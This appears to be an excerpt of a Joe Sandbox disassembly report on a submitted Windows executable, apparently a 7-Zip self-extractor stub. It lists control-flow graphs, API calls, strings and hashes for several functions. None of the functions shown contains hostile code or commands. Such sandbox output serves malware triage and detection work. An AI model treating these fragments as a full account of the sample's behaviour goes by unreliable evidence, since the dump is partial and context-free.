                                                                    control_flow_graph 1153 40e9ef-40ea0a call 410a40 1156 40ea19-40ea52 call 406eb0 call 40f707 1153->1156 1157 40ea0c-40ea16 1153->1157 1162 40eb20-40eb46 call 40e79c call 40e6d7 1156->1162 1163 40ea58-40ea62 ??2@YAPAXI@Z 1156->1163 1175 40eb64-40eb7c call 40cdda call 401132 1162->1175 1176 40eb48-40eb5e call 40e2e8 1162->1176 1165 40ea71 1163->1165 1166 40ea64-40ea6f 1163->1166 1167 40ea73-40eaac call 40ef4a ??2@YAPAXI@Z 1165->1167 1166->1167 1173 40eabe 1167->1173 1174 40eaae-40eabc 1167->1174 1177 40eac0-40eaf9 call 40ef4a call 40c350 call 40e45f 1173->1177 1174->1177 1190 40ebb4-40ebc4 1175->1190 1191 40eb7e-40eb8b ??2@YAPAXI@Z 1175->1191 1176->1175 1184 40ece0-40ecf7 1176->1184 1206 40eb01-40eb06 1177->1206 1207 40eafb-40eafd 1177->1207 1195 40ee93-40eeae call 40e27a 1184->1195 1196 40ecfd 1184->1196 1208 40ebf4-40ebfa 1190->1208 1209 40ebc6 1190->1209 1192 40eb96 1191->1192 1193 40eb8d-40eb94 call 40e7c1 1191->1193 1198 40eb98-40eba8 call 40f707 1192->1198 1193->1198 1212 40eeb0-40eeb6 1195->1212 1213 40eeb9-40eebc 1195->1213 1202 40ed00-40ed30 1196->1202 1221 40ebaa-40ebad 1198->1221 1222 40ebaf 1198->1222 1219 40ed60-40eda6 call 40cd11 * 2 1202->1219 1220 40ed32-40ed38 1202->1220 1217 40eb08-40eb0a 1206->1217 1218 40eb0e-40eb1a 1206->1218 1207->1206 1214 40ec00-40ec20 call 40cf2f 1208->1214 1215 40ecce-40ecdd call 40e977 1208->1215 1216 40ebc8-40ebee call 40ce5c call 40e2c5 call 40e42c call 40e4dd 1209->1216 1212->1213 1213->1216 1224 40eec2-40eee9 call 40cd11 1213->1224 1234 40ec25-40ec2d 1214->1234 1215->1184 1216->1208 1217->1218 1218->1162 1218->1163 1264 40ee10 1219->1264 1265 40eda8-40edab 1219->1265 1228 40ee00-40ee02 1220->1228 1229 40ed3e-40ed50 1220->1229 1230 40ebb1 1221->1230 1222->1230 1246 40ef01-40ef1d 1224->1246 1247 40eeeb-40eeff call 4107a2 1224->1247 1240 40ee06-40ee0b 1228->1240 1251 40ed56-40ed58 1229->1251 1252 40edda-40eddc 1229->1252 1230->1190 1238 40ec33-40ec3a 1234->1238 1239 40edca-40edcf 1234->1239 1248 40ec68-40ec6b 1238->1248 1249 40ec3c-40ec40 1238->1249 1242 40edd1-40edd3 1239->1242 1243 40edd7 1239->1243 1240->1216 1242->1243 1243->1252 1318 40ef1e call 40bb40 1246->1318 1319 40ef1e call 40c5e0 1246->1319 1320 40ef1e call 40e17a 1246->1320 1321 40ef1e call 41297c 1246->1321 1247->1246 1253 40ec71-40ec7f call 40f707 1248->1253 1254 40edf9-40edfe 1248->1254 1249->1248 1257 40ec42-40ec45 1249->1257 1251->1219 1260 40ed5a-40ed5c 1251->1260 1261 40ede4-40ede7 1252->1261 1262 40edde-40ede0 1252->1262 1281 40ec81-40ec87 call 413226 1253->1281 1282 40ec8c-40ec9d call 40e45f 1253->1282 1254->1228 1254->1240 1267 40ec4b-40ec59 call 40f707 1257->1267 1268 40edec-40edf1 1257->1268 1258 40ef21-40ef2b call 40ce5c 1258->1216 1260->1219 1261->1216 1262->1261 1270 40ee13-40ee19 1264->1270 1275 40edae-40edc6 call 4107a2 1265->1275 1267->1282 1285 40ec5b-40ec66 call 413201 1267->1285 1268->1240 1274 40edf3-40edf5 1268->1274 1277 40ee64-40ee8d call 40ce5c * 2 1270->1277 1278 40ee1b-40ee27 call 40e558 1270->1278 1274->1254 1290 40edc8 1275->1290 1277->1195 1277->1202 1296 40ee35-40ee41 call 40e5a3 1278->1296 1297 40ee29-40ee33 1278->1297 1281->1282 1298 40eca5-40ecaa 1282->1298 1299 40ec9f-40eca1 1282->1299 1285->1282 1290->1270 1311 40ef30-40ef45 call 40ce5c * 2 1296->1311 1312 40ee47 1296->1312 1303 40ee4a-40ee62 call 4107a2 1297->1303 1300 40ecb2-40ecb7 1298->1300 1301 40ecac-40ecae 1298->1301 1299->1298 1306 40ecb9-40ecbb 1300->1306 1307 40ecbf-40ecc8 1300->1307 1301->1300 1303->1277 1303->1278 1306->1307 1307->1214 1307->1215 1311->1216 1312->1303 1318->1258 1319->1258 1320->1258 1321->1258
                                                                    APIs
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,?,00000000,?), ref: 0040EA5A
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000028,00000000,00000000,?,00000000,?), ref: 0040EAA4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@
                                                                    • String ID: DmA${D@
                                                                    • API String ID: 1033339047-1777112864
                                                                    • Opcode ID: 0fbc1e047aa24a6cf396f6002696145173c8f9cc79442394acc3b55e615792f3
                                                                    • Instruction ID: 6b6f199f6b2a7d9dc60afa7eeb36d7837fa60508d4a378e5edde095099593778
                                                                    • Opcode Fuzzy Hash: 0fbc1e047aa24a6cf396f6002696145173c8f9cc79442394acc3b55e615792f3
                                                                    • Instruction Fuzzy Hash: 0E120371900249DFCB24DF66C88099ABBB5FF08304B14496EF91AA7391DB39E995CF84
                                                                    Function 00410CCB Relevance: 7.6, APIs: 5, Instructions: 141COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1322 410ccb-410ce8 call 40e0d0 1325 410e20-410e23 1322->1325 1326 410cee-410cf5 call 41076b 1322->1326 1329 410cf7-410cf9 1326->1329 1330 410cfe-410d2d call 40e036 memcpy 1326->1330 1329->1325 1333 410d30-410d38 1330->1333 1334 410d50-410d68 1333->1334 1335 410d3a-410d48 1333->1335 1341 410d6a-410d6f 1334->1341 1342 410dcf 1334->1342 1336 410dc4-410dcd ??3@YAXPAX@Z 1335->1336 1337 410d4a 1335->1337 1339 410e1e-410e1f 1336->1339 1337->1334 1338 410d4c-410d4e 1337->1338 1338->1334 1338->1336 1339->1325 1344 410d71-410d79 1341->1344 1345 410dd4-410dd7 1341->1345 1343 410dd1-410dd2 1342->1343 1346 410e17-410e1c ??3@YAXPAX@Z 1343->1346 1347 410d7b 1344->1347 1348 410dad-410dbf memmove 1344->1348 1345->1343 1346->1339 1349 410d8a-410d8e 1347->1349 1348->1333 1350 410d90-410d92 1349->1350 1351 410d82-410d84 1349->1351 1350->1348 1353 410d94-410d9d call 41076b 1350->1353 1351->1348 1352 410d86-410d87 1351->1352 1352->1349 1356 410dd9-410e0f memcpy call 40d041 1353->1356 1357 410d9f-410dab 1353->1357 1359 410e12-410e15 1356->1359 1357->1348 1358 410d7d-410d80 1357->1358 1358->1349 1359->1346
                                                                    APIs
                                                                    • memcpy.MSVCRT(00000000,?,00000020,00010000), ref: 00410D22
                                                                    • memmove.MSVCRT(00000000,?,00000020,?,00010000), ref: 00410DB9
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00410DC5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@memcpymemmove
                                                                    • String ID:
                                                                    • API String ID: 3549172513-0
                                                                    • Opcode ID: bb969950ca7e8fc586f1592cde3b65447558a250e482fe49850de850b0ee1319
                                                                    • Instruction ID: 2e51937533cdabe9fe59c05819b629b516a53c036badf135e90f0136c29b37f2
                                                                    • Opcode Fuzzy Hash: bb969950ca7e8fc586f1592cde3b65447558a250e482fe49850de850b0ee1319
                                                                    • Instruction Fuzzy Hash: F141C171A00204ABDB24EAA5D940BFEB7B5FF84704F14446EE846A7341D7B8BEC18B59
                                                                    Function 00404903 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1374 404903-404984 #17 call 413370 call 402131 call 402187 * 7 1393 404989-40499d SHGetSpecialFolderPathW 1374->1393 1394 404a32-404a36 1393->1394 1395 4049a3-4049ed wsprintfW call 401458 * 2 call 401370 * 2 call 4032d9 1393->1395 1394->1393 1396 404a3c-404a40 1394->1396 1406 4049f2-4049f8 1395->1406 1407 404a22-404a28 1406->1407 1408 4049fa-404a1d call 401370 * 2 call 4032d9 1406->1408 1407->1406 1410 404a2a-404a2d call 40269a 1407->1410 1408->1407 1410->1394
                                                                    APIs
                                                                    • #17.COMCTL32(00000000,00000020,-00000002), ref: 0040490F
                                                                      • Part of subcall function 00402131: GetUserDefaultUILanguage.KERNEL32(0040491F), ref: 0040213B
                                                                      • Part of subcall function 00402187: GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
                                                                      • Part of subcall function 00402187: wsprintfW.USER32 ref: 004021E7
                                                                      • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
                                                                      • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402201
                                                                      • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
                                                                      • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
                                                                      • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402236
                                                                      • Part of subcall function 00402187: lstrcmpiW.KERNEL32(00928E78,00404926), ref: 0040224B
                                                                      • Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(00928E78), ref: 0040225B
                                                                      • Part of subcall function 00402187: SetLastError.KERNEL32(?), ref: 00402282
                                                                      • Part of subcall function 00402187: lstrlenA.KERNEL32(00416208), ref: 004022B6
                                                                      • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
                                                                      • Part of subcall function 00402187: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303
                                                                      • Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(00404926), ref: 00402279
                                                                      • Part of subcall function 00402187: _wtol.MSVCRT ref: 00402314
                                                                      • Part of subcall function 00402187: MultiByteToWideChar.KERNEL32(00000000,00416208,00000001,00928E78,00000002), ref: 00402334
                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000), ref: 00404995
                                                                    • wsprintfW.USER32 ref: 004049B0
                                                                      • Part of subcall function 004032D9: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
                                                                    • String ID: 7zSfxFolder%02d
                                                                    • API String ID: 3387708999-2820892521
                                                                    • Opcode ID: 0b64465946cb2e48a0dbd03d6f906f8cc659a125e1421e758d292e165e0ccb9d
                                                                    • Instruction ID: 5234f5b279cb727febf32c6091b250cce28905a448a9d0e240f4fe7ebf0ff8ab
                                                                    • Opcode Fuzzy Hash: 0b64465946cb2e48a0dbd03d6f906f8cc659a125e1421e758d292e165e0ccb9d
                                                                    • Instruction Fuzzy Hash: 2731B471A10205ABCB10FFA1DC9AAEEB768AF40304F00417FFA15B60E1EB784946CB58
                                                                    Function 00402BEE Relevance: 6.4, APIs: 5, Instructions: 118stringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1416 402bee-402c38 call 413660 call 40d041 lstrlenA * 2 1420 402c3d-402c59 call 40d00d 1416->1420 1422 402d29 1420->1422 1423 402c5f-402c64 1420->1423 1424 402d2b-402d2f 1422->1424 1423->1422 1425 402c6a-402c74 1423->1425 1426 402c77-402c7c 1425->1426 1427 402cbb-402cc0 1426->1427 1428 402c7e-402c83 1426->1428 1429 402ce5-402d09 memmove 1427->1429 1431 402cc2-402cd5 memcmp 1427->1431 1428->1429 1430 402c85-402c98 memcmp 1428->1430 1436 402d18-402d23 1429->1436 1437 402d0b-402d12 1429->1437 1432 402d25-402d27 1430->1432 1433 402c9e-402ca8 1430->1433 1434 402cb5-402cb9 1431->1434 1435 402cd7-402ce3 1431->1435 1432->1424 1433->1422 1438 402caa-402cb0 call 40292b 1433->1438 1434->1426 1435->1426 1436->1424 1437->1436 1439 402c3a 1437->1439 1438->1434 1439->1420
                                                                    APIs
                                                                    • lstrlenA.KERNEL32(?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402C20
                                                                    • lstrlenA.KERNEL32(?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402C28
                                                                    • memcmp.MSVCRT(00000000,?,?), ref: 00402C8E
                                                                    • memcmp.MSVCRT(00000000,?,?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402CCB
                                                                    • memmove.MSVCRT(?,?,00000000,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402CFD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlenmemcmp$memmove
                                                                    • String ID:
                                                                    • API String ID: 3251180759-0
                                                                    • Opcode ID: fa32a0385ddd39642fa32be0e776516a86df04650160174833642614f5e9d137
                                                                    • Instruction ID: de6905f5b60a3a827beaa0a9a9e283af0395689e13c8cf078280906fc371a6c9
                                                                    • Opcode Fuzzy Hash: fa32a0385ddd39642fa32be0e776516a86df04650160174833642614f5e9d137
                                                                    • Instruction Fuzzy Hash: A7414972D0424DAFDB11DFA4C9889EEBBB9EF48384F14406AE845B3290D3B49E85CB55
                                                                    Function 00402DD6 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1443 402dd6-402df1 call 401458 1446 402df7-402df8 1443->1446 1447 402ecd-402ee5 call 4013a9 ??3@YAXPAX@Z 1443->1447 1448 402dfb-402dff 1446->1448 1450 402eb3-402ebf call 401526 1448->1450 1451 402e05-402e0d 1448->1451 1459 402ec0-402ec6 1450->1459 1454 402e75-402e7d 1451->1454 1455 402e0f-402e18 call 401c46 1451->1455 1454->1450 1457 402e7f-402e8b call 401c46 1454->1457 1455->1454 1464 402e1a-402e73 call 40283b call 401458 call 402ad8 call 4013a9 ??3@YAXPAX@Z call 401429 ??3@YAXPAX@Z * 2 1455->1464 1457->1450 1466 402e8d-402e99 call 401c46 1457->1466 1459->1448 1462 402ecc 1459->1462 1462->1447 1464->1459 1466->1450 1471 402e9b-402eb1 call 401526 1466->1471 1471->1459
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(00405802,00405802,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000,00000000), ref: 00402EDC
                                                                      • Part of subcall function 00402AD8: MultiByteToWideChar.KERNEL32(00000020,00000000,00000024,?,00000000,?,?,00000020,00000024,00000000,00402E3A,?,?,00000000,00000000,00000000), ref: 00402B0A
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000), ref: 00402E49
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802), ref: 00402E64
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?), ref: 00402E6C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$ByteCharMultiWide
                                                                    • String ID:
                                                                    • API String ID: 1731127917-0
                                                                    • Opcode ID: f66a7f98c2fd82f3632a7c41bf5da107477e30d253b96dd7c1c620e0e730c424
                                                                    • Instruction ID: e682ebc0571d90e9fd1001dd074fc16d37aecbe567f5019eda1f00a411694e7c
                                                                    • Opcode Fuzzy Hash: f66a7f98c2fd82f3632a7c41bf5da107477e30d253b96dd7c1c620e0e730c424
                                                                    • Instruction Fuzzy Hash: BE31F672C44114AADB14FBA2DD429EF73BDEF10318B50443FF856B21E1EE3C9A4586A8
                                                                    Function 00401611 Relevance: 6.1, APIs: 4, Instructions: 100synchronizationthreadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1481 401611-401667 call 40f707 call 401370 call 401526 CreateThread 1488 401669 call 40851f 1481->1488 1489 40166e-401689 WaitForSingleObject 1481->1489 1488->1489 1491 40168b-40168e 1489->1491 1492 4016bd-4016c3 1489->1492 1495 401690-401693 1491->1495 1496 4016b1 1491->1496 1493 401721 1492->1493 1494 4016c5-4016da GetExitCodeThread 1492->1494 1502 401726-401729 1493->1502 1497 4016e4-4016ef 1494->1497 1498 4016dc-4016de 1494->1498 1499 401695-401698 1495->1499 1500 4016ad-4016af 1495->1500 1501 4016b3-4016bb call 408dbf 1496->1501 1504 4016f1-4016f2 1497->1504 1505 4016f7-401700 1497->1505 1498->1497 1503 4016e0-4016e2 1498->1503 1506 4016a9-4016ab 1499->1506 1507 40169a-40169d 1499->1507 1500->1501 1501->1493 1503->1502 1509 4016f4-4016f5 1504->1509 1510 401702-401709 1505->1510 1511 40170b-401717 SetLastError 1505->1511 1506->1501 1512 4016a4-4016a7 1507->1512 1513 40169f-4016a2 1507->1513 1515 401719-40171e call 408dbf 1509->1515 1510->1493 1510->1511 1511->1515 1512->1509 1513->1493 1513->1512 1515->1493
                                                                    APIs
                                                                    • CreateThread.KERNELBASE(00000000,00000000,004012E3,00000000,00000000,?), ref: 00401655
                                                                    • WaitForSingleObject.KERNEL32(000000FF,?,004017F5,?,?), ref: 00401676
                                                                      • Part of subcall function 00408DBF: wvsprintfW.USER32(?,00000000,?), ref: 00408DE3
                                                                      • Part of subcall function 00408DBF: GetLastError.KERNEL32 ref: 00408DF4
                                                                      • Part of subcall function 00408DBF: FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,00406B79), ref: 00408E1C
                                                                      • Part of subcall function 00408DBF: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00406B79), ref: 00408E31
                                                                      • Part of subcall function 00408DBF: lstrlenW.KERNEL32(?), ref: 00408E44
                                                                      • Part of subcall function 00408DBF: lstrlenW.KERNEL32(?), ref: 00408E4B
                                                                      • Part of subcall function 00408DBF: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00408E60
                                                                      • Part of subcall function 00408DBF: lstrcpyW.KERNEL32(00000000,?), ref: 00408E76
                                                                      • Part of subcall function 00408DBF: lstrcpyW.KERNEL32(-00000002,?), ref: 00408E87
                                                                      • Part of subcall function 00408DBF: ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 00408E90
                                                                      • Part of subcall function 00408DBF: LocalFree.KERNEL32(?), ref: 00408E9A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
                                                                    • String ID:
                                                                    • API String ID: 359084233-0
                                                                    • Opcode ID: 66257497e4407e65e3ec51839b2cc1af24185b4b9cde7a4118d25a0965ef4d55
                                                                    • Instruction ID: 99d6c8c0394ba6fc9b9d299436d7c7a44fadaa3de81f278bf7a0439fefe7fe09
                                                                    • Opcode Fuzzy Hash: 66257497e4407e65e3ec51839b2cc1af24185b4b9cde7a4118d25a0965ef4d55
                                                                    • Instruction Fuzzy Hash: 0D31E131600200FBCA355B54DC95EEB36A8EB81754B28853BF515F62F0DA7A8C829A1E
                                                                    Function 00404545 Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00406D05,00000000,?,?,00405368,?,7ZSfx%03x.cmd), ref: 00404568
                                                                    • GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,00405368,?,7ZSfx%03x.cmd), ref: 00404585
                                                                    • wsprintfW.USER32 ref: 004045BB
                                                                    • GetFileAttributesW.KERNELBASE(?), ref: 004045D6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: PathTemp$AttributesFilewsprintf
                                                                    • String ID:
                                                                    • API String ID: 1746483863-0
                                                                    • Opcode ID: 0e4a8cbd59d5c8a173ea11c71d2339e4dceea1800af4b6b4e6d7220fd0c99624
                                                                    • Instruction ID: 733027a3fcd96ec5c8df4ae3473da8ef02d46a04784f0fe1f39aec502691af17
                                                                    • Opcode Fuzzy Hash: 0e4a8cbd59d5c8a173ea11c71d2339e4dceea1800af4b6b4e6d7220fd0c99624
                                                                    • Instruction Fuzzy Hash: C1112772500604FFC701AF55CC84AADB7B8FF84314F10802EF946972E1CB799900CB94
                                                                    Function 00412525 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004105E9: _CxxThrowException.MSVCRT(?,00417298), ref: 00410603
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,(nA,?,00416DD8), ref: 00412643
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,(nA,?,00416DD8), ref: 0041279B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$ExceptionThrow
                                                                    • String ID: (nA
                                                                    • API String ID: 2803161813-867891557
                                                                    • Opcode ID: a23f4a3e4590838c40bb2731bcc9978bea7517a1840853a56b40fbfce1223ec6
                                                                    • Instruction ID: 0ece9700425cb4d864afba528f8150fdb1f56e7dd499115c8cef0e07f043e1c2
                                                                    • Opcode Fuzzy Hash: a23f4a3e4590838c40bb2731bcc9978bea7517a1840853a56b40fbfce1223ec6
                                                                    • Instruction Fuzzy Hash: A9814B70A00605AFCB24DFA5C591AEEFBF6BF08314F14452EE515E3391D7B8AA90CB58
                                                                    Function 0040CBAC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SysAllocString.OLEAUT32(?), ref: 0040CBC4
                                                                    • _CxxThrowException.MSVCRT(?,00416FBC), ref: 0040CBE7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: AllocExceptionStringThrow
                                                                    • String ID: PlA
                                                                    • API String ID: 3773818493-1533977103
                                                                    • Opcode ID: 9da6470fb493ce6a5e6bdcff394512404a5483abbe6bbc59635324e60b80df40
                                                                    • Instruction ID: 296fbbf4859103af06767512d87f49f38bd905f8065bfdcdd98956010b0ea552
                                                                    • Opcode Fuzzy Hash: 9da6470fb493ce6a5e6bdcff394512404a5483abbe6bbc59635324e60b80df40
                                                                    • Instruction Fuzzy Hash: 54E0ED71600304EADB209F65E8829D6BBF8EF04785710C53FF948DA250E7B9E980C79C
                                                                    Function 00403C93 Relevance: 4.7, APIs: 3, Instructions: 151COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040236F: LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 0040237F
                                                                      • Part of subcall function 0040236F: GetProcAddress.KERNEL32(00000000), ref: 00402386
